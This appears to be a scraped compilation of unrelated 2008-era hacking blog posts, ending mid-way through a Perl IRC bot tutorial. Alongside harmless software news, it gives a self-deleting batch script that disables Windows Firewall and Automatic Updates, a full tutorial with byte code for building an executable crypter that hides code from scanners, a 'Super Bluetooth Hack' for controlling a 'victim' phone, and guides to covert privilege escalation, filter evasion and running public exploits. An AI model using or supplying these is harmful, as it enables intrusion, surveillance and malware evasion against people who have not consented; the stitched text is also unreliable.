Download Updated Windows PowerShell 1.0 for XP SP3

Microsoft has updated Windows PowerShell 1.0 for Windows XP and Windows Server 2003 and made new English-language installation packages available for download as of June 23, 2008.




Designed to integrate with Windows Server 2003 SP1, SP2 and R2 (x86, x64 and Itanium-based) along with Windows XP SP2 (both the 32-bit and 64-bit editions) and SP3 (only 32-bit), the updated release of Windows PowerShell 1.0 does not target Microsoft's latest Windows client. Windows Vista SP1 is ignored with the latest variant of Windows Power Shell available since January 30, 2007, the day that Microsoft also made available Vista RTM. "Windows PowerShell is a new command-line shell and scripting language designed for system administration and automation. Built on the .NET Framework, Windows PowerShell enables IT professionals and developers control and automate the administration of Windows and applications," Microsoft informed in the product's description. "Windows PowerShell includes more than 130 command-line tools (called 'cmdlets') for performing common system administration tasks, such as managing services, processes, event logs, certificates, the registry, and using Windows Management Instrumentation (WMI)." Users should bear in mind that the downloads contain just the English-language installation packages for Windows XP and Windows Server 2003, and not any localized versions or the multilingual packs. Microsoft is currently hard at work on the successor of Windows PowerShell 1.0, namely version 2.0 which has only reached the stage of the second Community Technology Preview so far. At the bottom of this article, you will also find an embedded video containing tips and tricks of PowerShell, courtesy of Ben Pearce, a Premiere Field Engineer. Download: Windows PowerShell 1.0 for XP (link 1)

Tools to Automate RapidShare Downloading for Free Users With No CAPTCHA

RapidShare CAPTCHA has always been hacked no matter how tough they made it. Usually whenever RapidShare updates their CAPTCHA, it only took a few days for third party download tools to auto recognize it. One of the toughest CAPTCHA was with cats and dogs in them and it took 3-4 weeks to be cracked. A few days after the cats and dogs CAPTCHA has been cracked, RapidShare installed a new CAPTCHA system called TEABAG_3D.




The TEABAG_3D is developed by OCR Research Team and they are a bunch of CAPTCHA hackers too. They claim that after defeating several CAPTCHAs, they decided to make a CAPTCHA which is hard to break. I’ve been in communication with the developers of CryptLoad and jDownloader to keep track of the progress in defeating the latest 3D CAPTCHA in RapidShare. They were in 50% progress and suddenly RapidShare decided to eliminate the captchas to simplify the use of RapidShare’s free services significantly but with a catch that the download speed limit has been limited to 500kilobits per second, that is only 62.5KBps.

1. CryptLoad

- The interface is in English and configurations is not complicated. Other than downloading from RapidShare, it can also support downloading from many other One-Click hoster such as megaupload, gigasize, depositfiles and etc. Currently CryptLoad can only run on Windows with Microsoft .NET Framework and the next major update version 2 should support Mac OS and Linux as well. Supports automatic updates.
[ Download CryptLoad ]

2. JDownloader
- This tool has not been mentioned here before but I now tell you that this is a really good downloading tool for one-click-hosters website. JDownloader is open source, platform independent and written completely in Java. It simplifies downloading files from One-Click-Hosters like Rapidshare.com or Megaupload.com - not only for users with a premium account but also for users who don’t pay. It offers downloading in multiple parallel streams, captcha recognition, automatically file extraction and much more. Of course, JDownloader is absolutely free of charge. Additionally, many “link encryption” sites are supported - so you just paste the “encrypted” links and JD does the rest. Because it is written in Java, you can run JDownloader on Windows, Mac OS and Linux. Support automatic updates. Try it and you’ll love it!

[ Download jDownloader ]

3. CandiSoft Load!
- Load! also has not been mentioned at this blog before. The interface is in German but it shouldn’t be too hard to understand as some words are pretty similar to English. You can always make use of Google Translate to help you translate from German to English. Runs on Windows and supports automatic updates. It also supports other one-click-hosters such as megaupload, netload.in, uploaded.to and etc.
[ Download CandiSoft Load! ]


4. RS Downloader
- This tool has been mentioned at this blog before and the interface is in German. It runs on Windows, supports automatic updates and can only download from RapidShare. Can also automatic decrypt and recognized encrypted rapidshare links using YouCrypt plugin.
[ Download RS Downloader ]

5. Universal Share Downloader (USDownloader)
- USDownloader is another popular and powerful one-click-hoster download manager. It supports a lot of free hosting services, including the most popular ones like RapidShare, MegaUpload or YouSendIt. You can select up to 26 types of languages for the program’s interface and it runs on Windows. When want to do an update on USDownloader, you’ll have to use the server http://usd.cap-cap.ru/ because the one in the list doesn’t work.
Download USDownloader ]

source: raymond.cc

How To Change a Windows XP Limited User Account Into a Admin acc

PCLoginNow is an easy-to-use tool to reset local administrator and other accounts passwords on Windows system. No need to reinstall the system. It resets Windows passwords and Windows security settings instantly. All version of Windows are completely supported. It’s an incredible CD for Home users and Businesses. And most of all, it’s the most popular and safe solution for removing your Windows password until now.

Besides the abilities of resetting passwords, PCLoginNow can also help you maintain, change accounts policy setting and properties. You can easily upgrades an general account to administrator level, lock or unlock those accounts you don’t need anymore, And moreover, all of these are done without booting your tedious, time-consuming Windows System.

The most powerful feature PCLoginNow have is to support Syskey. SYSKEY is an optional feature since Windows NT 4.0 SP3. It is meant to protect against offline password cracking attacks so that the SAM database would still be secure even if someone had a copy of it. Even though the system registry is protected by Syskey, PCLoginNow can easily bypass this mechanism and reset the Windows passwords.

Only 4 simple steps are required to turn a limited user account into administrator.
1. Download PCLoginNow.

2. Burn the ISO image to a CD/DVD.

3. Boot up the computer with the CD/DVD.

4. Click the Next button when you see the message that says “PC Login Now! is ready to start, please click NEXT to continue…”

5. Select the Windows system that is found by PC Login Now program.

6. Select the user account that you want to edit, check “is Administrator” and click Next.
Change Limit User account to Administrator

7. Reboot and the user is now a local administrator of the computer.

I find this tool amazing because it can turn a user from zero into hero. I understand that some students are adventurous and would like to install or configure the system the way they like it but they cannot do it with a limited user account. Hence, they find a way to secretly upgrade their limited account to a local computer administrator and now they can do whatever they want. We cannot set a BIOS password because if the students entered the wrong security password for 3 times, it’ll be locked and we’ll have to contact HP support and get them to reset it.

Use Gmail as a drive in Windows

Google increased the storage limit for Gmail users just recently who have now roughly four Gigabytes at their disposal with the option to add even more storage that can be purchased in the account settings. The maximum amount is currently 400 Gigabytes of storage which would cost $500 per year.
Most users will probably be happy with the four Gigabytes and can use a small software called GMail Drive to add the Gmail storage as a drive in Windows. To do that the user needs to install GMail Drive and enter his login details when clicking on the new drive letter. I suggest to save this information unless you want to enter the username and password everytime you want to access the drive.
I mainly use it to backup important data, not as my primary backup location but a secondary one. All files that are stored on the drive are accessible on the Gmail website as well which means it is also possible to store files that you work with on different computers.
Read More:
Gmail Drive

how to Set up your own proxy server

Lot´s of people complain that webproxys are not working at their works / schools computer because they have been banned by administrators. A way around this would be to setup your very own proxy server that is being hosted a) by a free webhosting service that supports either php or cgi or b) your own website that is being hosted by a webhosting company.
Both methods should work and I will walk you right through the installation process for both scripts and give you tips how to find out what is actually being blocked. Before we start you need to download a copy of phpproxy or cgiproxy depending on what you want and can use. You also could perform a search for free webhosting on google for instance and try to find a webhoster that supports one of the two languages, a good site that I found while searching for those terms might be freewebspace.net

1. phpproxy
Download phpproxy and unpack it to a local directory on your hard drive. All you need to do know is to upload the script to your webspace and open up the new url to check if its working allright. You might want to rename the file to something different, something that does not contain the word proxy in it to avoid filters that ban everything that has the word “proxy” in it.
You could open up the script and enter your clients ip in there to make sure that only your client will be able to connect or you could add a .htaccess file to the directory forcing everyone who wants to start the script to enter a username and password. Again, use google if you like to find out more information about .htaccess
The php script has some requirements, make sure you read the readme file which is included and check to see if your hoster has those requirements enabled.
2. cgiproxy
Your hoster has to have cgi enabled in order to run this script. Many free hosters do not offer cgi or only some preinstalled scripts. Make sure it is enabled before you start the installation process.
First, download the source and unpack it to a local directory.
Now, open the .cgi file and take a look at the configuration. You can edit lots of settings from within, for example you could configure the script that way that it only allows text to go through the proxy but no images. Everything is explained in detail and all options are explained with comments, browse through the file, edit the options to your liking and save the new file.
After that upload the script to your cgi directory if that is required by your hoster and open the url from your browser. You are now ready to browse the web anonymously, to check if that is really the case load a website like whatismyip.com as the first site and check if the ip matches with the server the script is installed and not your computers ip. If that is the case you´ve done everything right and can surf anonymously. (there are still ways to find out your ip, just in case you are wondering)
3. What is being blocked ?
a) If you can access the proxy from the client they only block domains / ips.
b) If you can´t access the proxy they might be banning filenames that contain proxy as well, try changing the filename.

Super Bluetooth Hack 2008

his is a New Version of Super bluetooth Hack for Conventional and Mobile-based Symbian. This program through MDM can be used to control other people’s mobile phone at a distance (10-15 metres, it’s Then)


Super Bluetooth hack New 2008
More in New Version :
1) Connect via BT/Irda
2) Reading SMS
3) Changing time/alarms
4) Pressing keys…
What else can you do once connected to a another phone via blue tooth?
1) Read SMS matches.
2) Turn off telephone.
3) Switch on music.
4) Choose modes (normal, without sound …)
5) Block Phone.
6) Read his Contacts
7) Change Profile
Play his Ringtone even if phone is on silent
9) Restore Factory Settings.
10) Restart the phone
11) Change Ringing Volume
And here comes the best
“Call from his phone” it includes all call functions like hold etc.
And much, much more


Install:
1) Download
2) Pour on the mobile
3) Run the Installer (what you download, incidentally need java
4) He finds it, and you will be able to run software
5) Choose the language and going configured
6) click Connection
7) Click search devices
Choose the “victim”
9) AND MANAGE
Download Super Bluetooth hack New 2008

Which Browser Are More Secure

Some new statistics just came out regarding Browser Security, this is more in terms of which users are most likely to apply patches and be using the most secure version.
I would have thought Firefox would have been pretty high since the newer series prompt automatically new patches. My only guess is a lot of people are still using 1.5x series which didn’t have that feature.
It turns out, that Internet Explorer is the ‘most secure’. Well that’s very subjective as IE doesn’t show sub versions like the other browsers do..and Windows Updates pushes out patches quite agressively. It also depends which set of data you look at as both conflict, one says Firefox users are more secure and one says IE.

The researchers who published a large study of web browser security this week had a great idea and excellent data to work with. Too bad they overreached with their conclusions. A lot more is being made of this paper than is warranted.
The researchers, from ETH Zurich, Google, and IBM, looked at log data provided by Google from their global user base for web search and applications for the period between January 2007 and June 2008. This data was based on the browser user-agent string, which is also the reason the data is not as telling as the authors argue.
What did the study conclude? First, lots of users are not running the most up-to-date and secure versions of their web browsers. Second, that this is primarily a phenomenon of Internet Explorer users; Firefox users, on the other hand, overwhelmingly update their browsers quickly. These and other results lead the authors to suggest that browsers get expiration dates, much like milk and pharmaceuticals.

As expected though a LOT of users are not running the latest version of their browser, but that doesn’t surprise us really does it?
I think the versioning is an issue though, with IE you only get to know about the major version (IE5, IE6, IE7, IE8) and not which actual patches they have applied.

Why, one might ask, does Microsoft not provide minor version information? Microsoft’s David LeBlanc answers that question in his blog by saying that they consider such information to be an “information disclosure vulnerability.” In other words, by giving a web-based attacker precise version information, you are also giving them better information on how to attack that browser.
In these measurements IE7 users are much more likely to be up to date than other browser users. The authors are correct that Secunia users are more likely to be security-aware, but even when they try to adjust the numbers, multiplying the IE7 number by 2.1 “… to correct for the bias of Secunia’s measurement within a security aware user population” IE7 still ends up looking better.

There is actually a discrepency between the two sets of data, the metrics are odd though and are based on heavy assumptions (IE7 is secure but IE6 is not, while IE7 is a MORE secure browser architecture and feature wise, a fully patched IE6 can also be perfectly secure).
I’d be interested to see more of these stats and see the full Google access logs for a few month period.
That would be some interesting data mining.
Source: eWeek

Batch File To Disable Firewall-Windows Xp Sp2

@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\firewall.reg" ECHO REGEDIT4
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
>>"%Temp%.\firewall.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\firewall.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\firewall.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\firewall.reg"
DEL "%Temp%.\firewall.reg"
DEL %0



Shuts down Windows Firewall, disables Automatic Updates for the next reboot.

And no, Microsoft is not going to fix this. This code will work when it goes live.

Build your own executable crypter

This article will take you through the basic steps of building an executable crypter. All of the steps performed in this article require manual setup and integration to prepare the exe for the crypter stub. The focus of this article is to walk you through the theory and know-how of how crypters work and does not attempt to create the latest greatest point and click solution.

For a basic background, here is how executable crypters work:

1) The actual processor commands of a protected binary are
crypted/obscured/munged whatever

2) When the protected application first starts, a small decrypter
stub is first run that restores all of the original processor
commands for the executable in memory.

3) Finally, the decrypter stub ends and transfers execution to the
original entry point (OEP) and the program runs normally.

In the course of this paper, we are going to manually implement a very simple 'crypter' to show you all of the development techniques, design considerations, and debugging details required to make your own.

First, let me introduce you to our target executable. It is a 28kb hello world application written in C. This simple application merely prints out "Hello World" to the screen, waits for a keypress and then exits.

To get us started, lets examine the PE structure of the executable file. Below is an image of the PE section table. You will notice that the .text section (where the actual executable code is housed) has a raw size of 4000h and a virtual size of 3DCEh .

The discrepancy in the numbers indicates that at the end of the .text section there is a certain amount of unused space not currently mapped into memory when the file is loaded. This blank spot in the executable file is good because it means we have an empty pad where we can place our own executable code.

To visually verify this you can open up the file in a hexeditor and look for a null pad. To know where to look you have to be able to find the right file offset. In our sample exe this is simplified because all of our sections have a virtual size <= their raw size and each sections raw offset = its virtual offset.

This is nice because it keeps all of the rva values in the PEheader = raw file offsets however this is not always the case. V.2 of the pe editor classes now take this into account and can calculate file offsets from rva values correctly. The assumption of rva = file offset will be made through out the remainder of this article because it holds true for this particular sample we are analyzing.

So...to see this null pad open up the original exe file in a hexeditor and check out the area between 4DCEh and 5000h (RawOffset + VirtualSize)

Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F

00004DC0 C0 74 06 0F B6 45 0B C9 C3 83 C8 FF C9 C3 00 00 Àt..E.ÉÃÈÿÉÃ..
00004DD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004DE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004DF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00004E80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

For our needs this will be more than enough space to place our simple decrypter stub. We do not necessarily need to squeeze our code into an existing section. Had we been short on space, we could have resorted to adding a new PE section and placing our code there.

Ok, we have found a home for our decrypter block, but first we have to make some adjustments to the PE section characteristics so that:

A) our decrypter code gets loaded into memory
B) once mapped into memory, we have write access to the main body of code
C) when the program is first loaded, execution begins with our decrypter code

As noted above, the virtual size of the section (the size loaded into memory) does not include this null pad we found in the file. Since we are going to be adding code to this area, we need to make sure that this area is loaded into memory as well. This is accomplished by increasing the virtual size for this PE section using a PE editor such as LordPE.

The second change we have to make is to make sure that the .text section is flagged as a writable area once mapped into memory. This is necessary because our decrypter stub needs to dynamically rewrite (decode) the actual processor codes to be executed. This too is easily done with LordPE from the "edit section header" dialog. Below is a graphic of the dialog sequence and field manipulations required in LordPE. Highlighted in yellow are the fields that we have altered.

Our next goal now becomes to make sure that when the executable first loads it is our decrypter stub that is first run. Since the real processor commands for the executable will not present on disk, having the program start at the original entry point would have the machine trying to execute what is essentially a jumbled block of data.

The program entry point can be directly edited from LordPEs main interface. For our demonstration lets choose to set the entry point at 4E00h. This offset sits 32 bytes from the end of our real applications code and gives us a nice easy spot to find in the hexeditor.

With the PE structure modifications out of the way, now we can move on to the actual work. Here is what we have left:

D) build the decrypter stub
E) crypt the actual executable's opcodes
F) integrate our decrypter stub into the modified binary

Lets start with some design visions for our encoding mechanism. Since this is a demo and a trainer, the encoding mechanism is going to be kept as lightweight and simple as possible. For these reasons a simple XOR encoding will be used.

The next design consideration is to enumerate what kind of variables a generic crypter stub is going to need. Basically any crypter stub is going to need three things:

1) what offset (in memory) to start decrypt data
2) length of the data to decrypt
3) entry point to transfer execution to after decrypted

Since we are designing a really simple stub, I am going to take a short cut and start the encryption routine right at the programs original entry point. While the EP is not at the very beginning of the code section, it is usually close enough that the majority of processor commands will be encrypted.

Before we get into the actual design and development of out decrypter stub, lets knock off the easy part of XORing the original opcodes first. This is a simple operation, and can be done in whatever way is the most convenient for the developer. The implementation I chose was to create a quick VB program that loops through the binary applying the XOR to the appropriate bytes representing the applications opcodes.

For a quick refresher:

Q) How do i know where the opcodes begin?
A) for our simple setup we are starting at the original program
entry point found in the PE Header

Q) How do I know how long of a block to encode?
A) Since we want to encode all of the opcodes after the entry point,
length of the data to encrypt is Original Virtual Size - Entry Point

Inline below is the VB source code used to encode the executable's opcodes:

StartAt = &H1048 'original entry point
length = &H2D86 '3DCE - 1048 (virtual size - entrypoint)

Open p2 For Binary As f

For i = 1 To length
offset = StartAt + i
Get f, offset, b
b = b Xor &HF
Put f, offset, b
Next

Close f


With that out of the way, we are now down to developing our decrypter stub. Basically what we need is a small block of ASM commands that we can paste into the encoded binary at our new entry point.

Below is the decoder block I came up with written in C:

void main(void){

int i;
char b;

char *buffer = 0x400000 ; // imagebase
long length = 0xBEEF ; // <-length of code (placeholder)

buffer += 0xDEAD ; // <- OEP offset (placeholder)

for(i=0; i < length; i++){

b = buffer ;
b = b ^ 0xF ;
buffer = b ;

}

_asm jmp buffer

}

Let me mention a couple points and design considerations about the above code.

* To make the stub generic you are going to have to edit the length and entry point offsets each time you use it. Make these some recognizable values in hex to make it easier to find them in the hexeditor.

* *buffer initially points to the imagebase, remember you are going to be working on memory addresses. The reason I increment *buffer latter to the entry point offset is because I will have to edit this value independently in a hexeditor.

* to transfer execution to the original entry point we just use a inline asm command jmp buffer. At this point *buffer is already pointing directly to the programs original entry point.

All in all it is a very simple decoder stub. The trick comes in debugging and implementing it. Since the decoder is designed to work on data and offsets not found in this standalone application, we can really only use the compiler to generate the opcodes for the commands we need. Debugging takes place by integrating the actual stub byte codes into our crypted exe and running that through the debugger.

Now that we have our proposed C source, we need the assembler byte codes associated with it. The easiest way I have found to get the asm byte codes from the compiler is to set a break point at the top of the code and start up the VC debugger by pressing F5.

Once VC has compiled the code, it will then launch the built in debugger which pauses execution at your preset breakpoint. Now you can right click on the main window and choose "goto disassembly" to see a mixed assortment of C and ASM commands.

Below is a stripped down ASM block generated by the compiler for us. On the left are the actual byte codes associated with the string assembler commands on the right.

C7 45 F4 00 00 40 00 mov dword ptr [ebp-0Ch],400000h
C7 45 F0 EF BE 00 00 mov dword ptr [ebp-10h],0BEEFh
8B 45 F4 mov eax,dword ptr [ebp-0Ch]
05 AD DE 00 00 add eax,0DEADh
89 45 F4 mov dword ptr [ebp-0Ch],eax
C7 45 FC 00 00 00 00 mov dword ptr [ebp-4],0
EB 09 jmp main+43h
8B 4D FC mov ecx,dword ptr [ebp-4]
83 C1 01 add ecx,1
89 4D FC mov dword ptr [ebp-4],ecx
8B 55 FC mov edx,dword ptr [ebp-4]
3B 55 F0 cmp edx,dword ptr [ebp-10h]
7D 22 jge main+6Dh
8B 45 F4 mov eax,dword ptr [ebp-0Ch]
03 45 FC add eax,dword ptr [ebp-4]
8A 08 mov cl,byte ptr [eax]
88 4D F8 mov byte ptr [ebp-8],cl
0F BE 55 F8 movsx edx,byte ptr [ebp-8]
83 F2 0F xor edx,0Fh
88 55 F8 mov byte ptr [ebp-8],dl
8B 45 F4 mov eax,dword ptr [ebp-0Ch]
03 45 FC add eax,dword ptr [ebp-4]
8A 4D F8 mov cl,byte ptr [ebp-8]
88 08 mov byte ptr [eax],cl
EB CD jmp main+3Ah
FF 65 F4 jmp dword ptr [ebp-0Ch]

In order for us to insert this into our executable, we must further strip out just the byte codes and write the hex values into our executable file. A nice way to do this is to strip out the assembler commands, remove all of the spaces, and place then in a long string such as this:

C745F400004000C745F0EFBE00008B45F405ADDE00008945F4C745FC
00000000EB098B4DFC83C101894DFC8B55FC3B55F07D228B45F40345
FC8A08884DF80FBE55F883F20F8855F88B45F40345FC8A4DF88808EB
CDFF65F4

From here, you can copy the text string and write the associated hex values directly into the binary using the Winhex hexeditor by highlighting the start offset (4E00h) pressing Ctrl-B (write clipboard) and then choosing the "ACII Hex" clipboard format.

Once that is done, all we have left is to edit the data length and start offset placeholders compiled into the stub and it will be configured for this binary. If you wrote the stub in starting at offset 4E00h then you will find the BEEFh data length marker at offset 4E0Ah , and the DEADh entry point marker at offset 4E12h.

Note that both of these values are in little endian format. When you go to modify them with the actual values, remember to also write the new values in little endian format.

Below are hexeditor views of the modifications made.

Offset 0 1 2 3
00004E10 .. .. AD DE (DEAD)
00004E10 .. .. 48 10 (1048)

Offset 0 1 2 3 4 5 6 7 8 9 A B
00004E00 .. .. .. .. .. .. .. .. .. .. EF BE (BEEF)
00004E00 .. .. .. .. .. .. .. .. .. .. 86 2D (2D86)

With our decrypter block in place, our main code crypted, and the entry point now aimed at the decrypter, everything should be set and ready to run !

Open it up in Olly, give it a shot and see what happens. Before you start stepping through code, look around the original entry point and see what the disassembly looks like.

004010DC 12 DB 12
004010DD 05 DB 05
004010DE 0F DB 0F
004010DF 0F DB 0F
004010E0 AE DB AE
004010E1 53 DB 53
004010E2 63 DB 63
004010E3 4F DB 4F
004010E4 0F DB 0F
004010E5 AC DB AC
004010E6 6F DB 6F
004010E7 63 DB 63
004010E8 4F DB 4F

Yup, thats a jarbled mess characteristic of a data block or encrypted opcodes... Now go back to the end of the decrypter block and set a breakpoint on the final "jmp buffer" command:

00404E55 >^FF65 F4 JMP DWORD PTR SS:[EBP-C] ; final.00401048

After reaching this point, scroll back up again and take another look at the original entry point 401048. If you still see a junk block of commands such as the above mess, it is because Olly has not yet analyzed the new byte values for processor commands. To fix this, right click in the main disassembly window and choose 'analyze code'. Now you should see the actual decoded instructions:

00401048 /. 55 PUSH EBP
00401049 |. 8BEC MOV EBP,ESP
0040104B |. 6A FF PUSH -1
0040104D |. 68 B8504000 PUSH final.004050B8
00401052 |. 68 9C244000 PUSH final.0040249C ; SE handler installation
00401057 |. 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
0040105D |. 50 PUSH EAX
0040105E |. 64:8925 000000>MOV DWORD PTR FS:[0],ESP
00401065 |. 83EC 10 SUB ESP,10

Now you can hit the run button and Voila ! It should all function just as expected !

Looks like everything is in place and running just as it should be

Note that using C to generate the Opcodes can make the decoder a bit bloated. If you wanted to write your decoder directly in asm you could use a stub similar to the following: (even this could be optimized further)

00404E3A B8 48104000 MOV EAX,401048 ;start offset
00404E3F B9 862D0000 MOV ECX,2D86 ;length
00404E44 8BD0 MOV EDX,EAX ;copy of start offset (OEP)
00404E46 8030 0F XOR BYTE PTR DS:[EAX],0F ;top_of_loop decode inst
00404E49 40 INC EAX ;next byte
00404E4A 49 DEC ECX ;dec counter
00404E4B ^75 F9 JNZ SHORT 00404E46 ;counter !=0 goto top_of_loop
00404E4D FFE2 JMP EDX ;jmp OEP

As one last little nugget, let me throw out a quick tip you can use to restore a crypted exe such as this to its former state

Lets assume the decrypter stub did some actual encryption that we do not want to try to reverse engineer. If the crypter stub only operated on an uncompressed data block that was fully present in the exe and did not perform any other tricks or manipulations the restoration of the executable can actually be very simple.

Give this a shot..load the exe in olly and break on the last jmp buffer. Here the actual executable code is fully decrypted in memory and ready to be run. Now fire up LordPE and dump the 401000 - 405000 memory address range to grab the full .text section from memory. You now have all of the decrypted opcodes saved to disk

Write down the address of the original entry point that the jmp command was going to take you to and exit olly. Open up the memory dump and the crypted exe in Winhex and write the entire dump of the .text section over the crypted .text section in the executable.

Save it, then change the entry point back to the original you wrote down and give it a click. Tadaahhh magic.....kinda..well not really...but you know. *shrugs*

Anyway, this was a fun bit to design and figure out how to do. Hopefully this takes some of the "magic" out of how executable crypters work and should be enough to help someone else along.

I also caved in and wrote an quick point and click utility to integrate this crypter stub into arbitrary executables. You can snag the app plus VB source here. (also has a nice set of classes for PE header manipulation)


Source: http://sandsprite.com/CodeStuff/Build_your_own_executable_crypter.html[/quote]

Compiling Perl coded exploits

at the first time we all where like:

what the hell is : #!/usr/bin/perl ??

Exemble:

Code:

http://www.milw0rm.com/id.php?id=1244

im gunne explain u how u make this work.
———————————————————————
1: get active perl:

Code:

http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.7.813-MSWin32-x86-148120.msi

perl = .pl u can’t make .pl files working without active perl. U can but then u have to use a server with perl. most of them have that but thats not what im gunne learn u.
————————————————————————————-
2: after downloading/installing active perl its time to begin.

Copy al the text u got in here to a word pad

like this:

Code:

http://www.milw0rm.com/id.php?id=1244

Now u have to turn the wordpad file into a perl file (.pl)

here:
file/save as/

like this:

yaya its dutch>.<

filename: phpmyadmin.pl
save as type: all files

save it on ur c:\
just in the root.

got it? saved it? now its a perl file.

next step
—————————————————————————–
3. Now u have to run the file. how? read!

open ms dos.

how? : START/RUN/ and type in cmd

ola now ur in ms dos.

now press:
cd c:\

like this:

now ur in the c:
press:

phpmyadmin.pl
and it loads up the perl file.

picture:

———————————————————————————–
now fil in the HOST/DIR/FILE and ur done
———————————————————————————–

Bare Bones IRC Bot In Perl.

by b0iler :

b0iler@hotmail.com : last update July 26th 2002
Written for :

http://b0iler.eyeonsecurity.net - my site full of other cool tutorials

by b0iler :

This is a short guide to creating your own perl bot which will work on irc. I will not
cover all the different modules and ways to connect to irc and issue commands. This
will only cover connecting with IO::Socket and using raw irc commands. I feel you learn
the most this way and have alot of control over what is happening.

IRC experience is helpful, but I’ll take things slow enough so that an absolute beginner
can understand what is taking place. This will also help those with alittle knowledge
fully understand the irc protocol. Although I am no irc expert, after creating this
bot I did learn a few tricks.

We start off by getting a connection underway:

#!/usr/bin/perl
use IO::Socket;

$sock = IO::Socket::INET->new(
 PeerAddr => 'irc.undernet.org',
 PeerPort => 6667,
 Proto => 'tcp' ) or die "could not make the connection";

You can use any irc server and any port (commonly used ports are 6667-7000), so long
as they are valid. If you have problems try to find a different server on that
network. To make things easier you can make the PeerAddr a variable which is
specified by an argument from the command line. Or purhaps map out all the servers
on the network and make an arry from them, connecting to random ones and using the
best connection. There are many possibilities, each work best for certain
situations. We’ll stick to the simple hard coded address and port.

Now we have a connection to the server. We still need to get connected/logged in to
the ircd. Anything we send to or recieve from the server will go through $sock. So
lets see what the server is sending us after we make a connection.

while($line = <$sock>){
 print "$line\n";
}

We will see that the server prints out some lines. Each line will have a number
representation to it. This will really help to tell the bot when to start and end
routines. The key here is the line with ‘NOTICE AUTH’ in it. This is when we need
to login to the irc server. To do this we send

NICK bots_nick
USER bots_ident 0 0 :bots name

With a line break after the bots_nick and a line break at the end. So in the while loop
we will add something like this:

while($line = <$sock>){
 print $line;
 if($line =~ /(NOTICE AUTH).*(checking ident)/i){
  print $sock "NICK b0ilersbot\nUSER bot 0 0 :just a bot\n";
  last;
 }
}

Now we are done with the login process. If you are having any problems try to read up
on the irc protocol and how to login to it with telnet. Raven from www.securitywriters.org
has wrote a decent tutorial on the subject, look for it.

Some servers will ask for a ping to make sure the client is active. This is only done
on some servers and is a common pitfall to many bots which don’t support this kind of
login proceedure. To handle this we will check if the server wants us to ping it.
The server will ask for a ping before it asks about nickserv registration/identification,
so we will stop this loop after it mentions nickserv. This is what those numbers in
the last if statment are for, the 376|422. The way to identify to nickserv is like this

NICKSERV :identify nick_password

this is just a simple irc command. The command is ‘NICKSERV’ and the arguments are
‘identify nick_password’ where nick_password is the actual password for this nick. The
line ends in a line break and all irc commands are in upper case. When there is a :
before something it means it is a multiple word argument (has spaces in it). This is
how we will handle the possible ping and the nickserv identification.

while($line = <$sock>){
 print $line;
 #use next line if the server asks for a ping
 if($line =~ /^PING/){
  print $sock "PONG :" . (split(/ :/, $line))[1];
 }
 if($line =~ /(376|422)/i){
  print $sock “NICKSERV :identify nick_password\n”;
  last;
 }
}

If you want to have a registration code you can find this out on your own.. or do what I
do and register the nick with a normal irc client. This way we only need the bot to
identify.

When you create your bot you can customize it however you want. Most of my bots have
alittle bit more AI then this tutorial shows. This bot will be pretty strait forword
and doesn’t make many decisions. It just connects and does something.

I like to make the bot sleep for a few seconds just to get the connection cought up.
I am on a 56k and things can go slow sometimes. A few times without the sleep the bot
has joined channels before the nickserv identification is complete, this can be a pain
in the neck if the bot needs a usermode or other circumstances which require the nick
to be identified (such as other bots, +R channel mode, or trust issues with users).

After it sleeps it will join the channel. You will see that the server prints out alot
of information about the channel when you join. You can save this information in
variables to allow the bot to make many decisions. Again, this is a simple bot and
won’t be aware of it’s environment or be dynamic in anyway. But you could for example
turn on/off colors by what channel modes are set or who is in the channel (some people
really hate colors). This is the last bit of the login proccess, after this the bot
can actually do something.

sleep 3;
print $sock "JOIN #channel\n";

Notice there is no : before #channel. This is because it does not have any spaces in it.
And the JOIN command is in all caps. For a full list of commands try reading a tutorial
on the IRC protocol. I don’t even cover the basics here, there are tons of useful to know
commands.

Now we are joining the channel. There is nothing else to do besides read the messages
users send to the channel and respond to them. But inorder to read the messages we need
to parse them so they make sense. The format of a priv_msg is as follows:

:nick!ident@hostname.com PRIVMSG #channel :the line of text

I like to seperate them into the following variables to make things easier to keep track of.

:$nick!$hostname $type $channel :$text

in this example here is the values of the variables:

$nick = nick
$hostname = ident
$type = priv_msg
$channel = #channel
$text = the line of text

So we are going to need to parse what is send from the server into useable data. This is
how we’ll do it. There is only one twist here, and that is incase the server sends a
ping. They do this quite often to check and see if you are still connected. If we don’t
reply the the pings then we will get disconnected. When the server sends a ping you
must reply with a PONG and the same characters the ping had. So this is how we will send it

while ($line = <$sock&gt  {
 ($command, $text) = split(/ :/, $line);   #$text is the stuff from the ping or the text from the server

 if ($command eq ‘PING’){
  #while there is a line break - many different ways to do this
  while ( (index($text,”\r”) >= 0) || (index($text,”\n”) >= 0) ){ chop($text); }
